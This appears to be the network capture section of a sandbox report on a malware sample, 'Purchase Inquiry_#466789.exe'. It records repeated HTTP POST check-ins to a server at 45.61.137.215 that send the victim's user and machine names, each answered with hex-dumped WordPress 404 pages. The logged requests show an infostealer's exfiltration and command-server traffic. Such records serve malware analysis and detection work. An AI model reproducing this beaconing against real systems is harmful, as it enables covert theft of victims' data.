                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:26.752981901 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:32:26.753010035 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:32:26.753041029 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:32:26.753091097 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:32:26.753124952 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:32:26.753155947 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:26.753190994 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:32:26.753225088 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:32:26.753573895 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.44975345.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:26.906514883 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:26.911513090 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:29.290330887 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:27 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:29.290360928 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:32:29.290383101 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:32:29.290394068 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                  Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                  May 27, 2024 08:32:29.290402889 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                  Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                  May 27, 2024 08:32:29.290467978 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                  Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                  May 27, 2024 08:32:29.290690899 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:29.290707111 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:32:29.290720940 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:32:29.290915012 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.44975445.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:29.447879076 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:29.457859993 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:31.799910069 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:29 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:31.799923897 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:32:31.799933910 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:32:31.799946070 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:32:31.799957991 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:32:31.799968004 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:31.800026894 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                  May 27, 2024 08:32:31.800036907 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                  May 27, 2024 08:32:31.800060034 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                  Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                  May 27, 2024 08:32:31.800070047 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.44975545.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:33.963829041 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:33.968913078 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:36.116638899 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:34 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
